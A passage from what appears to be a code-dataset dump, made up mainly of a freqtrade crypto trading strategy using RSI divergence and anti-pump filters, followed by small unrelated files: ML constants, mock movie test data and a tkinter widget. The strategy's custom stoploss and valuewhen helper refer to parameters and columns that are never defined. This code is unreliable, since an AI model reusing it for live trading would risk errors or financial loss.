INTERFACE_VERSION = 2\r\n\r\n # Modified ROI - 20210620\r\n # ROI table:\r\n minimal_roi = {\r\n \"0\": 0.028,\r\n \"10\": 0.018,\r\n \"30\": 0.010,\r\n \"40\": 0.005\r\n }\r\n\r\n\r\n custom_trade_info = {}\r\n\r\n # Stoploss:\r\n stoploss = -0.11\r\n\r\n antipump_threshold = DecimalParameter(0, 0.4, default=0.25, space='buy', optimize=True)\r\n\r\n # SMAOffset\r\n base_nb_candles_buy = IntParameter(5, 80, default=buy_params['base_nb_candles_buy'], space='buy', optimize=True)\r\n 
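# NOTE: IntParameter/DecimalParameter declare the hyperopt search space for each value;\r\n    # the 'default' entry is what a plain backtest/dry-run uses, which is why the defaults\r\n    # here are pulled from the buy_params/sell_params dicts dumped above.\r\n    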
base_nb_candles_sell = IntParameter(5, 80, default=sell_params['base_nb_candles_sell'], space='sell', optimize=True)\r\n    low_offset = DecimalParameter(0.9, 0.99, default=buy_params['low_offset'], space='buy', optimize=True)\r\n    low_offset_2 = DecimalParameter(0.9, 0.99, default=buy_params['low_offset_2'], space='buy', optimize=True)\r\n    high_offset = DecimalParameter(0.95, 1.1, default=sell_params['high_offset'], space='sell', optimize=True)\r\n    high_offset_2 = DecimalParameter(0.99, 1.5, default=sell_params['high_offset_2'], space='sell', optimize=True)\r\n\r\n    #SMAOffsetProtectOptV1\r\n    low_offset2 = DecimalParameter(0.9, 0.99, default=buy_params['low_offset2'], space='buy', optimize=True)\r\n    base_nb_candles_buy2 = IntParameter(5, 80, default=buy_params['base_nb_candles_buy2'], space='buy', optimize=True)\r\n    base_nb_candles_sell2 = IntParameter(5, 80, default=sell_params['base_nb_candles_sell2'], space='sell', optimize=True)\r\n    high_offset2 = DecimalParameter(0.95, 1.1, default=sell_params['high_offset2'], space='sell', optimize=True)\r\n\r\n    # Protection\r\n    fast_ewo = 50\r\n    slow_ewo = 200\r\n    ewo_low = DecimalParameter(-20.0, -8.0, default=buy_params['ewo_low'], space='buy', optimize=True)\r\n    ewo_high = DecimalParameter(2.00, 12.0, default=buy_params['ewo_high'], space='buy', optimize=True)\r\n    ewo_high_2 = DecimalParameter(-6.0, 12.0, default=buy_params['ewo_high_2'], space='buy', optimize=True)\r\n    rsi_buy = IntParameter(30, 70, default=buy_params['rsi_buy'], space='buy', optimize=True)\r\n\r\n    #SMAOffsetProtectOptV1\r\n    ewo_low2 = DecimalParameter(-20.0, -8.0, default=buy_params['ewo_low2'], space='buy', optimize=True)\r\n    ewo_high2 = DecimalParameter(2.0, 12.0, default=buy_params['ewo_high2'], space='buy', optimize=True)\r\n    rsi_buy2 = IntParameter(30, 70, default=buy_params['rsi_buy2'], space='buy', optimize=True)\r\n\r\n    # Trailing stop:\r\n    trailing_stop = False\r\n    #trailing_stop_positive = 0.005\r\n    #trailing_stop_positive_offset = 0.03\r\n    #trailing_only_offset_is_reached = True\r\n\r\n    # Sell signal\r\n    use_sell_signal = False\r\n    sell_profit_only = False\r\n    sell_profit_offset = 0.01\r\n    ignore_roi_if_buy_signal = False\r\n\r\n    # Optimal timeframe for the strategy\r\n    timeframe = '5m'\r\n    informative_timeframe = '1h'\r\n\r\n    process_only_new_candles = True\r\n    startup_candle_count: int = 100\r\n\r\n    plot_config = {\r\n        'main_plot': {\r\n            'ma_buy': {'color': 'orange'},\r\n            'ma_sell': {'color': 'orange'},\r\n        },\r\n    }\r\n    # Strategy Specific Variable Storage\r\n    custom_trade_info = {}\r\n\r\n\r\n    def informative_pairs(self):\r\n\r\n        pairs = self.dp.current_whitelist()\r\n        informative_pairs = [(pair, self.informative_timeframe) for pair in pairs]\r\n\r\n        return informative_pairs\r\n\r\n    def get_informative_indicators(self, metadata: dict):\r\n\r\n        dataframe = self.dp.get_pair_dataframe(\r\n            pair=metadata['pair'], timeframe=self.informative_timeframe)\r\n\r\n        return dataframe\r\n\r\n    def populate_indicators(self, dataframe: DataFrame, metadata: dict) -> DataFrame:\r\n\r\n        rsi_len = 14\r\n        src = dataframe['close']\r\n        lbL = 10 #5\r\n        dataframe['osc'] = ta.RSI(src, rsi_len)\r\n        dataframe['osc'] = dataframe['osc'].fillna(0)\r\n\r\n        # plFound = na(pivotlow(osc, lbL, lbR)) ? 
false : true\r\n dataframe['min'] = dataframe['osc'].rolling(lbL).min()\r\n dataframe['prevMin'] = np.where(dataframe['min'] > dataframe['min'].shift(), dataframe['min'].shift(), dataframe['min'])\r\n dataframe.loc[\r\n (dataframe['osc'] == dataframe['prevMin'])\r\n , 'plFound'] = 1\r\n dataframe['plFound'] = dataframe['plFound'].fillna(0)\r\n\r\n # phFound = na(pivothigh(osc, lbL, lbR)) ? false : true\r\n dataframe['max'] = dataframe['osc'].rolling(lbL).max()\r\n dataframe['prevMax'] = np.where(dataframe['max'] < dataframe['max'].shift(), dataframe['max'].shift(), dataframe['max'])\r\n dataframe.loc[\r\n (dataframe['osc'] == dataframe['prevMax'])\r\n , 'phFound'] = 1\r\n dataframe['phFound'] = dataframe['phFound'].fillna(0)\r\n\r\n\r\n #------------------------------------------------------------------------------\r\n # Regular Bullish\r\n # Osc: Higher Low\r\n # oscHL = osc[lbR] > valuewhen(plFound, osc[lbR], 1) and _inRange(plFound[1])\r\n dataframe['valuewhen_plFound_osc'], dataframe['inrange_plFound_osc'] = valuewhen(dataframe, 'plFound', 'osc', 1)\r\n dataframe.loc[\r\n (\r\n (dataframe['osc'] > dataframe['valuewhen_plFound_osc']) &\r\n (dataframe['inrange_plFound_osc'] == 1)\r\n )\r\n , 'oscHL'] = 1\r\n\r\n # Price: Lower Low\r\n # priceLL = low[lbR] < valuewhen(plFound, low[lbR], 1)\r\n dataframe['valuewhen_plFound_low'], dataframe['inrange_plFound_low'] = valuewhen(dataframe, 'plFound', 'low', 1)\r\n dataframe.loc[\r\n (dataframe['low'] < dataframe['valuewhen_plFound_low'])\r\n , 'priceLL'] = 1\r\n #bullCond = plotBull and priceLL and oscHL and plFound\r\n dataframe.loc[\r\n (\r\n (dataframe['priceLL'] == 1) &\r\n (dataframe['oscHL'] == 1) &\r\n (dataframe['plFound'] == 1)\r\n )\r\n , 'bullCond'] = 1\r\n\r\n # //------------------------------------------------------------------------------\r\n # // Hidden Bullish\r\n # // Osc: Lower Low\r\n #\r\n # oscLL = osc[lbR] < valuewhen(plFound, osc[lbR], 1) and _inRange(plFound[1])\r\n dataframe['valuewhen_plFound_osc'], dataframe['inrange_plFound_osc'] = valuewhen(dataframe, 'plFound', 'osc', 1)\r\n dataframe.loc[\r\n (\r\n (dataframe['osc'] < dataframe['valuewhen_plFound_osc']) &\r\n (dataframe['inrange_plFound_osc'] == 1)\r\n )\r\n , 'oscLL'] = 1\r\n #\r\n # // Price: Higher Low\r\n #\r\n # priceHL = low[lbR] > valuewhen(plFound, low[lbR], 1)\r\n dataframe['valuewhen_plFound_low'], dataframe['inrange_plFound_low'] = valuewhen(dataframe,'plFound', 'low', 1)\r\n dataframe.loc[\r\n (dataframe['low'] > dataframe['valuewhen_plFound_low'])\r\n , 'priceHL'] = 1\r\n # hiddenBullCond = plotHiddenBull and priceHL and oscLL and plFound\r\n dataframe.loc[\r\n (\r\n (dataframe['priceHL'] == 1) &\r\n (dataframe['oscLL'] == 1) &\r\n (dataframe['plFound'] == 1)\r\n )\r\n , 'hiddenBullCond'] = 1\r\n\r\n # //------------------------------------------------------------------------------\r\n # // Regular Bearish\r\n # // Osc: Lower High\r\n #\r\n # oscLH = osc[lbR] < valuewhen(phFound, osc[lbR], 1) and _inRange(phFound[1])\r\n dataframe['valuewhen_phFound_osc'], dataframe['inrange_phFound_osc'] = valuewhen(dataframe, 'phFound', 'osc', 1)\r\n dataframe.loc[\r\n (\r\n (dataframe['osc'] < dataframe['valuewhen_phFound_osc']) &\r\n (dataframe['inrange_phFound_osc'] == 1)\r\n )\r\n , 'oscLH'] = 1\r\n #\r\n # // Price: Higher High\r\n #\r\n # priceHH = high[lbR] > valuewhen(phFound, high[lbR], 1)\r\n dataframe['valuewhen_phFound_high'], dataframe['inrange_phFound_high'] = valuewhen(dataframe, 'phFound', 'high', 1)\r\n dataframe.loc[\r\n (dataframe['high'] > 
dataframe['valuewhen_phFound_high'])\r\n , 'priceHH'] = 1\r\n #\r\n # bearCond = plotBear and priceHH and oscLH and phFound\r\n dataframe.loc[\r\n (\r\n (dataframe['priceHH'] == 1) &\r\n (dataframe['oscLH'] == 1) &\r\n (dataframe['phFound'] == 1)\r\n )\r\n , 'bearCond'] = 1\r\n\r\n # //------------------------------------------------------------------------------\r\n # // Hidden Bearish\r\n # // Osc: Higher High\r\n #\r\n # oscHH = osc[lbR] > valuewhen(phFound, osc[lbR], 1) and _inRange(phFound[1])\r\n dataframe['valuewhen_phFound_osc'], dataframe['inrange_phFound_osc'] = valuewhen(dataframe, 'phFound', 'osc', 1)\r\n dataframe.loc[\r\n (\r\n (dataframe['osc'] > dataframe['valuewhen_phFound_osc']) &\r\n (dataframe['inrange_phFound_osc'] == 1)\r\n )\r\n , 'oscHH'] = 1\r\n #\r\n # // Price: Lower High\r\n #\r\n # priceLH = high[lbR] < valuewhen(phFound, high[lbR], 1)\r\n dataframe['valuewhen_phFound_high'], dataframe['inrange_phFound_high'] = valuewhen(dataframe, 'phFound', 'high', 1)\r\n dataframe.loc[\r\n (dataframe['high'] < dataframe['valuewhen_phFound_high'])\r\n , 'priceLH'] = 1\r\n #\r\n # hiddenBearCond = plotHiddenBear and priceLH and oscHH and phFound\r\n dataframe.loc[\r\n (\r\n (dataframe['priceLH'] == 1) &\r\n (dataframe['oscHH'] == 1) &\r\n (dataframe['phFound'] == 1)\r\n )\r\n , 'hiddenBearCond'] = 1\r\n\r\n # Calculate all ma_buy values\r\n for val in self.base_nb_candles_buy.range:\r\n dataframe[f'ma_buy_{val}'] = ta.EMA(dataframe, timeperiod=val)\r\n\r\n # Calculate all ma_buy values\r\n for val in self.base_nb_candles_buy2.range:\r\n dataframe[f'ma_buy2_{val}'] = ta.EMA(dataframe, timeperiod=val)\r\n\r\n # Calculate all ma_sell values\r\n for val in self.base_nb_candles_sell.range:\r\n dataframe[f'ma_sell_{val}'] = ta.EMA(dataframe, timeperiod=val)\r\n\r\n # Calculate all ma_sell values\r\n for val in self.base_nb_candles_sell2.range:\r\n dataframe[f'ma_sell2_{val}'] = ta.EMA(dataframe, timeperiod=val)\r\n\r\n dataframe['hma_50'] = qtpylib.hull_moving_average(dataframe['close'], window=50)\r\n dataframe['hma_9'] = qtpylib.hull_moving_average(dataframe['close'], window=9)\r\n dataframe['ema_100'] = ta.EMA(dataframe, timeperiod=100)\r\n\r\n dataframe['sma_9'] = ta.SMA(dataframe, timeperiod=9)\r\n dataframe['ema_9'] = ta.EMA(dataframe, timeperiod=9)\r\n\r\n # Elliot\r\n dataframe['EWO'] = EWO(dataframe, self.fast_ewo, self.slow_ewo)\r\n\r\n #pump stregth\r\n dataframe['zema_30'] = ftt.zema(dataframe, period=30)\r\n dataframe['zema_200'] = ftt.zema(dataframe, period=200)\r\n dataframe['pump_strength'] = (dataframe['zema_30'] - dataframe['zema_200']) / dataframe['zema_30']\r\n\r\n # RSI\r\n dataframe['rsi'] = ta.RSI(dataframe, timeperiod=14)\r\n\r\n dataframe['rsi_fast'] = ta.RSI(dataframe, timeperiod=4)\r\n dataframe['rsi_slow'] = ta.RSI(dataframe, timeperiod=20)\r\n\r\n dataframe['rmi'] = RMI(dataframe, length=24, mom=5)\r\n\r\n dataframe['roc'] = dataframe['close'].pct_change(12).rolling(12).max() * 100\r\n\r\n # Base pair informative timeframe indicators\r\n informative = self.dp.get_pair_dataframe(pair=metadata['pair'], timeframe=self.informative_timeframe)\r\n\r\n # Get the \"average day range\" between the 1d high and 1d low to set up guards\r\n informative['1d-high'] = informative['close'].rolling(24).max()\r\n informative['1d-low'] = informative['close'].rolling(24).min()\r\n\r\n dataframe = merge_informative_pair(dataframe, informative, self.timeframe, self.informative_timeframe, ffill=True)\r\n\r\n return dataframe\r\n\r\n def populate_buy_trend(self, dataframe: 
DataFrame, metadata: dict) -> DataFrame:\r\n conditions = []\r\n dont_buy_conditions = []\r\n\r\n dont_buy_conditions.append(\r\n (dataframe['pump_strength'] > self.antipump_threshold.value) &\r\n (dataframe['bearCond'] < 1) &\r\n (dataframe['hiddenBearCond'] < 1)\r\n )\r\n #\"\"\r\n\r\n conditions.append(\r\n (\r\n ( (dataframe['bullCond'] > 0) | (dataframe['hiddenBullCond'] > 0) )&\r\n (dataframe['sma_9'] < dataframe[f'ma_buy_{self.base_nb_candles_buy.value}'])&\r\n (dataframe['rsi_fast'] <35)&\r\n (dataframe['rsi_fast'] >4)&\r\n (dataframe['close'] < (dataframe[f'ma_buy_{self.base_nb_candles_buy.value}'] * self.low_offset.value)) &\r\n (dataframe['EWO'] > self.ewo_high.value) &\r\n (dataframe['rsi'] < self.rsi_buy.value) &\r\n (dataframe['volume'] > 0)&\r\n (dataframe['close'] < (dataframe[f'ma_sell_{self.base_nb_candles_sell.value}'] * self.high_offset.value))\r\n )\r\n )\r\n\r\n conditions.append(\r\n (\r\n ( (dataframe['bullCond'] > 0) | (dataframe['hiddenBullCond'] > 0) )&\r\n (dataframe['sma_9'] < dataframe[f'ma_buy_{self.base_nb_candles_buy.value}'])&\r\n (dataframe['rsi_fast'] <35)&\r\n (dataframe['rsi_fast'] >4)&\r\n (dataframe['close'] < (dataframe[f'ma_buy_{self.base_nb_candles_buy.value}'] * self.low_offset_2.value)) &\r\n (dataframe['EWO'] > self.ewo_high_2.value) &\r\n (dataframe['rsi'] < self.rsi_buy.value) &\r\n (dataframe['volume'] > 0)&\r\n (dataframe['close'] < (dataframe[f'ma_sell_{self.base_nb_candles_sell.value}'] * self.high_offset.value))&\r\n (dataframe['rsi']<25)\r\n )\r\n )\r\n\r\n conditions.append(\r\n (\r\n ( (dataframe['bullCond'] > 0) | (dataframe['hiddenBullCond'] > 0) )&\r\n (dataframe['sma_9'] < dataframe[f'ma_buy_{self.base_nb_candles_buy.value}'])&\r\n (dataframe['rsi_fast'] < 35)&\r\n (dataframe['rsi_fast'] >4)&\r\n (dataframe['close'] < (dataframe[f'ma_buy_{self.base_nb_candles_buy.value}'] * self.low_offset.value)) &\r\n (dataframe['EWO'] < self.ewo_low.value) &\r\n (dataframe['volume'] > 0)&\r\n (dataframe['close'] < (dataframe[f'ma_sell_{self.base_nb_candles_sell.value}'] * self.high_offset.value))\r\n )\r\n )\r\n #\"\"\r\n\r\n #SMAOffsetProtectOptV1\r\n conditions.append(\r\n (\r\n ( (dataframe['bullCond'] > 0) | (dataframe['hiddenBullCond'] > 0) )&\r\n (dataframe['close'] < (dataframe[f'ma_buy2_{self.base_nb_candles_buy2.value}'] * self.low_offset2.value)) &\r\n (dataframe['EWO'] > self.ewo_high2.value) &\r\n (dataframe['rsi'] < self.rsi_buy2.value) &\r\n (dataframe['volume'] > 0)\r\n )\r\n )\r\n\r\n conditions.append(\r\n (\r\n ( (dataframe['bullCond'] > 0) | (dataframe['hiddenBullCond'] > 0) )&\r\n (dataframe['close'] < (dataframe[f'ma_buy2_{self.base_nb_candles_buy2.value}'] * self.low_offset2.value)) &\r\n (dataframe['EWO'] < self.ewo_low2.value) &\r\n (dataframe['volume'] > 0)\r\n )\r\n )\r\n\r\n\r\n if conditions:\r\n dataframe.loc[\r\n reduce(lambda x, y: x | y, conditions),\r\n 'buy'\r\n ]=1\r\n\r\n if dont_buy_conditions:\r\n for condition in dont_buy_conditions:\r\n dataframe.loc[condition, 'buy'] = 0\r\n\r\n\r\n return dataframe\r\n\r\n def populate_sell_trend(self, dataframe: DataFrame, metadata: dict) -> DataFrame:\r\n conditions = []\r\n dataframe.loc[:, 'sell'] = 0\r\n\r\n \"\"\"\r\n conditions.append(\r\n (\r\n (dataframe['close'] > (dataframe[f'ma_sell_{self.base_nb_candles_sell.value}'] * self.high_offset.value)) &\r\n (dataframe['volume'] > 0)\r\n )\r\n )\r\n conditions.append(\r\n (\r\n (dataframe['close'] > (dataframe[f'ma_sell2_{self.base_nb_candles_sell2.value}'] * self.high_offset2.value)) &\r\n (dataframe['volume'] > 
0)\r\n )\r\n )\r\n \"\"\"\r\n\r\n if conditions:\r\n dataframe.loc[\r\n reduce(lambda x, y: x | y, conditions),\r\n 'sell'\r\n ]=1\r\n\r\n return dataframe\r\n\r\n #\"\"\r\n def custom_sell(self, pair: str, trade: Trade, current_time: datetime, current_rate: float,\r\n current_profit: float, **kwargs):\r\n dataframe, _ = self.dp.get_analyzed_dataframe(pair, self.timeframe)\r\n last_candle = dataframe.iloc[-1].squeeze()\r\n\r\n # only neg\r\n #if current_profit < -0.1:\r\n # if last_candle['hiddenBearCond'] == 1:\r\n # return 'Hidden_Bear_div_loss'\r\n\r\n #if current_profit < -0.1:\r\n # if last_candle['bearCond'] == 1:\r\n # return 'Bear on neg'\r\n\r\n #only pos\r\n if current_profit > 0:\r\n if last_candle['hiddenBearCond'] == 1:\r\n return 'Hidden_Bear_div_profit'\r\n\r\n if current_profit > 0:\r\n if last_candle['bearCond'] == 1:\r\n return 'Bear_div_profit'\r\n\r\n # both\r\n #if current_profit > 0 or current_profit < -0.01:\r\n # if last_candle['hiddenBearCond'] == 1:\r\n # return 'Hidden_Bear'\r\n\r\n #if current_profit > 0 or current_profit < -0.01:\r\n # if last_candle['bearCond'] == 1:\r\n # return 'Bear'\r\n\r\n\r\n return None\r\n #\"\"\r\n\r\n\r\n\r\n\r\nclass SMAoffset_antipump_div(custom):\r\n\r\n def populate_buy_trend(self, dataframe: DataFrame, metadata: dict) -> DataFrame:\r\n conditions = []\r\n dont_buy_conditions = []\r\n\r\n dont_buy_conditions.append(\r\n (dataframe['pump_strength'] > self.antipump_threshold.value) &\r\n (dataframe['bearCond'] < 1) &\r\n (dataframe['hiddenBearCond'] < 1)\r\n )\r\n #\"\"\r\n conditions.append(\r\n (\r\n ( (dataframe['bullCond'] > 0) | (dataframe['hiddenBullCond'] > 0) )&\r\n (dataframe['sma_9'] < dataframe[f'ma_buy_{self.base_nb_candles_buy.value}'])&\r\n (dataframe['rsi_fast'] <35)&\r\n (dataframe['rsi_fast'] >4)&\r\n (dataframe['close'] < (dataframe[f'ma_buy_{self.base_nb_candles_buy.value}'] * self.low_offset.value)) &\r\n (dataframe['EWO'] > self.ewo_high.value) &\r\n (dataframe['rsi'] < self.rsi_buy.value) &\r\n (dataframe['volume'] > 0)&\r\n (dataframe['close'] < (dataframe[f'ma_sell_{self.base_nb_candles_sell.value}'] * self.high_offset.value))\r\n )\r\n )\r\n conditions.append(\r\n (\r\n ( (dataframe['bullCond'] > 0) | (dataframe['hiddenBullCond'] > 0) )&\r\n (dataframe['sma_9'] < dataframe[f'ma_buy_{self.base_nb_candles_buy.value}'])&\r\n (dataframe['rsi_fast'] <35)&\r\n (dataframe['rsi_fast'] >4)&\r\n (dataframe['close'] < (dataframe[f'ma_buy_{self.base_nb_candles_buy.value}'] * self.low_offset_2.value)) &\r\n (dataframe['EWO'] > self.ewo_high_2.value) &\r\n (dataframe['rsi'] < self.rsi_buy.value) &\r\n (dataframe['volume'] > 0)&\r\n (dataframe['close'] < (dataframe[f'ma_sell_{self.base_nb_candles_sell.value}'] * self.high_offset.value))&\r\n (dataframe['rsi']<25)\r\n )\r\n )\r\n\r\n conditions.append(\r\n (\r\n ( (dataframe['bullCond'] > 0) | (dataframe['hiddenBullCond'] > 0) )&\r\n (dataframe['sma_9'] < dataframe[f'ma_buy_{self.base_nb_candles_buy.value}'])&\r\n (dataframe['rsi_fast'] < 35)&\r\n (dataframe['rsi_fast'] >4)&\r\n (dataframe['close'] < (dataframe[f'ma_buy_{self.base_nb_candles_buy.value}'] * self.low_offset.value)) &\r\n (dataframe['EWO'] < self.ewo_low.value) &\r\n (dataframe['volume'] > 0)&\r\n (dataframe['close'] < (dataframe[f'ma_sell_{self.base_nb_candles_sell.value}'] * self.high_offset.value))\r\n )\r\n )\r\n #\"\"\r\n\r\n #SMAOffsetProtectOptV1\r\n conditions.append(\r\n (\r\n ( (dataframe['bullCond'] > 0) | (dataframe['hiddenBullCond'] > 0) )&\r\n (dataframe['close'] < 
(dataframe[f'ma_buy2_{self.base_nb_candles_buy2.value}'] * self.low_offset2.value)) &\r\n (dataframe['EWO'] > self.ewo_high2.value) &\r\n (dataframe['rsi'] < self.rsi_buy2.value) &\r\n (dataframe['volume'] > 0)\r\n )\r\n )\r\n\r\n #\"\"\r\n conditions.append(\r\n (\r\n ( (dataframe['bullCond'] > 0) | (dataframe['hiddenBullCond'] > 0) )&\r\n (dataframe['close'] < (dataframe[f'ma_buy2_{self.base_nb_candles_buy2.value}'] * self.low_offset2.value)) &\r\n (dataframe['EWO'] < self.ewo_low2.value) &\r\n (dataframe['volume'] > 0)\r\n )\r\n )\r\n #\"\"\r\n\r\n if conditions:\r\n dataframe.loc[\r\n reduce(lambda x, y: x | y, conditions),\r\n 'buy'\r\n ]=1\r\n\r\n if dont_buy_conditions:\r\n for condition in dont_buy_conditions:\r\n dataframe.loc[condition, 'buy'] = 0\r\n\r\n return dataframe\r\n\r\n\r\n\r\n \"\"\"\r\n Custom Stoploss\r\n \"\"\"\r\n def custom_stoploss_test(self, pair: str, trade: 'Trade', current_time: datetime,\r\n current_rate: float, current_profit: float, **kwargs) -> float:\r\n sl_new = 1\r\n\r\n if not self.config['runmode'].value in ('backtest', 'hyperopt'):\r\n dataframe, _ = self.dp.get_analyzed_dataframe(pair, self.timeframe)\r\n if(len(dataframe) >= 1):\r\n last_candle = dataframe.iloc[-1]\r\n if((last_candle['sell_copy'] == 1) & (last_candle['buy_copy'] == 0)):\r\n sl_new = 0.001\r\n\r\n return sl_new\r\n\r\n\r\n def custom_stoploss(self, pair: str, trade: 'Trade', current_time: datetime, current_rate: float, current_profit: float, **kwargs) -> float:\r\n\r\n trade_dur = int((current_time.timestamp() - trade.open_date_utc.timestamp()) // 60)\r\n\r\n if self.config['runmode'].value in ('live', 'dry_run'):\r\n dataframe, last_updated = self.dp.get_analyzed_dataframe(pair=pair, timeframe=self.timeframe)\r\n sroc = dataframe['sroc'].iat[-1]\r\n # If in backtest or hyperopt, get the indicator values out of the trades dict (Thanks @JoeSchr!)\r\n else:\r\n sroc = self.custom_trade_info[trade.pair]['sroc'].loc[current_time]['sroc']\r\n\r\n if current_profit < self.cstp_threshold.value:\r\n if self.cstp_bail_how.value == 'roc' or self.cstp_bail_how.value == 'any':\r\n # Dynamic bailout based on rate of change\r\n if (sroc/100) <= self.cstp_bail_roc.value:\r\n return 0.001\r\n if self.cstp_bail_how.value == 'time' or self.cstp_bail_how.value == 'any':\r\n # Dynamic bailout based on time\r\n if trade_dur > self.cstp_bail_time.value:\r\n return 0.001\r\n\r\n return 1\r\n\r\ndef valuewhen(dataframe, condition, source, occurrence):\r\n copy = dataframe.copy()\r\n copy['colFromIndex'] = copy.index\r\n copy = copy.sort_values(by=[condition, 'colFromIndex'], ascending=False).reset_index(drop=True)\r\n copy['valuewhen'] = np.where(copy[condition] > 0, copy[source].shift(-occurrence), 100)\r\n copy['valuewhen'] = copy['valuewhen'].fillna(100)\r\n copy['barrsince'] = copy['colFromIndex'] - copy['colFromIndex'].shift(-occurrence)\r\n copy.loc[\r\n (\r\n (rangeLower <= copy['barrsince']) &\r\n (copy['barrsince'] <= rangeUpper)\r\n )\r\n , \"in_range\"] = 1\r\n copy['in_range'] = copy['in_range'].fillna(0)\r\n copy = copy.sort_values(by=['colFromIndex'], ascending=True).reset_index(drop=True)\r\n return copy['valuewhen'], copy['in_range']\r\n\r\ndef EWO(dataframe, ema_length=5, ema2_length=35):\r\n df = dataframe.copy()\r\n ema1 = ta.EMA(df, timeperiod=ema_length)\r\n ema2 = ta.EMA(df, timeperiod=ema2_length)\r\n emadif = (ema1 - ema2) / df['close'] * 100\r\n return emadif\r\n\r\ndef RMI(dataframe, *, length=20, mom=5):\r\n df = dataframe.copy()\r\n\r\n df['maxup'] = (df['close'] - 
df['close'].shift(mom)).clip(lower=0)\r\n df['maxdown'] = (df['close'].shift(mom) - df['close']).clip(lower=0)\r\n\r\n df.fillna(0, inplace=True)\r\n\r\n df[\"emaInc\"] = ta.EMA(df, price='maxup', timeperiod=length)\r\n df[\"emaDec\"] = ta.EMA(df, price='maxdown', timeperiod=length)\r\n\r\n df['RMI'] = np.where(df['emaDec'] == 0, 0, 100 - 100 / (1 + df[\"emaInc\"] / df[\"emaDec\"]))\r\n\r\n return df[\"RMI\"]\r\n\r\ndef SROC(dataframe, roclen=21, emalen=13, smooth=21):\r\n df = dataframe.copy()\r\n\r\n roc = ta.ROC(df, timeperiod=roclen)\r\n ema = ta.EMA(df, timeperiod=emalen)\r\n sroc = ta.ROC(ema, timeperiod=smooth)\r\n\r\n return sroc\r\n","repo_name":"davidzr/freqtrade-strategies","sub_path":"strategies/custom/custom.py","file_name":"custom.py","file_ext":"py","file_size_in_byte":27227,"program_lang":"python","lang":"en","doc_type":"code","stars":8,"dataset":"github-code","pt":"53"} +{"seq_id":"38134799727","text":"\nPAD = 0\nUNK = 1\nBOS = 2\nEOS = 3\n\nPAD_WORD = '<blank>'\nUNK_WORD = '<unk>'\nBOS_WORD = '<s>'\nEOS_WORD = '</s>'\n\nCLIP_SIZE_Q = 4\nCLIP_SIZE_R = 3\nCLIP_SIZE_O = 2\n\n\n#CUDA_VISIBLE_DEVICES=2 python train_origin.py -data_type Trans -learning_rate 0.012 -n_warmup_steps 180000 -batch_size 2\n\n#CUDA_VISIBLE_DEVICES=0 python train_origin.py -data_type FrameQA -learning_rate 0.01 -n_warmup_steps 12000 -batch_size 6 -dropout 0.1\n\n#CUDA_VISIBLE_DEVICES=3 python train_origin.py -data_type Action -learning_rate 0.04 -n_warmup_steps 70000 -batch_size 4 -n_layers 2 -dropout 0.15\n\n#CUDA_VISIBLE_DEVICES=0 python train_origin.py -data_type Count -learning_rate 0.002 -n_warmup_steps 10000 -batch_size 6 -n_layers 2 \n","repo_name":"axcyoung/graph_vqa","sub_path":"transformer/Constants.py","file_name":"Constants.py","file_ext":"py","file_size_in_byte":701,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"11179864658","text":"import uuid\nimport random\n\nmovies = [{\n 'id': str(uuid.uuid4()),\n 'imdb_rating': round(random.random() * 10, 1),\n 'genre': [\n {'id': '789', 'name': 'Action'},\n {'id': '546', 'name': 'Music Story'}\n ],\n 'title': 'The Star',\n 'description': 'New World',\n 'directors': [\n {'id': '1', 'name': 'Jack Jones'},\n {'id': '2', 'name': 'Steven Spielberg'}\n ],\n 'actors_names': ['Jack Jones', 'Robbie Williams'],\n 'writers_names': ['Jack Jones', 'Serena Williams'],\n 'actors': [\n {'id': '1', 'name': 'Jack Jones'},\n {'id': '3', 'name': 'Robbie Williams'}\n ],\n 'writers': [\n {'id': '1', 'name': 'Jack Jones'},\n {'id': '4', 'name': 'Serena Williams'}\n ],\n} for _ in range(60)]\n\ngenres = [\n {\n 'id': '789',\n 'name': 'Action',\n 'description': 'Action description'\n },\n {\n 'id': '123',\n 'name': 'Fantasy',\n 'description': 'Fantasy description!'\n },\n {\n 'id': '456',\n 'name': 'Music Story',\n 'description': 'Music description'\n }\n]\n\npersons = [\n {\n 'id': '1',\n 'full_name': 'Jack Jones',\n },\n {\n 'id': '2',\n 'full_name': 'Steven Spielberg',\n },\n {\n 'id': '3',\n 'full_name': 'Robbie Williams'\n },\n {\n 'id': '4',\n 'full_name': 'Serena Williams'\n },\n {\n 'id': '5',\n 'full_name': 'Lev Tolstoj'\n },\n {\n 'id': '6',\n 'full_name': 'Gabriel Garcia Markes'\n }\n]\n\ndata = {'movies': movies, 'genres': genres, 'persons': 
persons}\n\n","repo_name":"dkarpele/Auth_sprint_2","sub_path":"content_api/tests/functional/testdata/es_data.py","file_name":"es_data.py","file_ext":"py","file_size_in_byte":1599,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"27958306565","text":"from tkinter import *\nfrom tkinter.ttk import Combobox\nfrom include.custom_spinbox import CustomSpinbox\nfrom ..helper import dummy\n\n\nclass TimeSigFrame(LabelFrame):\n\n def __init__(self, parent, cb=dummy):\n LabelFrame.__init__(self, parent, text=\"Time Signature\", padx=4, pady=5)\n self.cb = cb\n\n self._init_ui()\n\n def _init_ui(self):\n self.beat_count_spinbox = CustomSpinbox(self, start=4, from_=1, to=99, width=3)\n self.beat_count_spinbox.on_value_change(self._forward)\n\n self._beat_unit_var = StringVar()\n values = [str(2 ** i) for i in range(1, 6)]\n self.beat_unit_combobox = Combobox(\n self, values=values, width=3,\n textvariable=self._beat_unit_var,\n state='readonly')\n self._beat_unit_var.set('4')\n self._beat_unit_var.trace('w', self._forward)\n\n self.sep_label = Label(self, text='/')\n\n self.beat_count_spinbox.grid(row=0, column=0, sticky=W)\n self.sep_label.grid(row=0, column=1, sticky=W+N+E+S)\n self.beat_unit_combobox.grid(row=0, column=2, sticky=E)\n self.grid_columnconfigure(1, weight=1)\n\n def _forward(self, *args):\n beat_count = int(self.beat_count_spinbox.get())\n beat_unit = int(self.beat_unit_combobox.get())\n self.cb((beat_count, beat_unit))\n\n def set_timesig(self, timesig):\n beat_count, beat_unit = timesig\n self.beat_count_spinbox.set(beat_count)\n self.beat_unit_combobox.set(beat_unit)","repo_name":"yippp/tk-piano-roll","sub_path":"src/views/timesig_frame.py","file_name":"timesig_frame.py","file_ext":"py","file_size_in_byte":1499,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"6025690159","text":"\"\"\"\nA number chain is created by continuously adding the square of the digits in a number to form a new number until it has been seen before.\n\nFor example,\n\n44 → 32 → 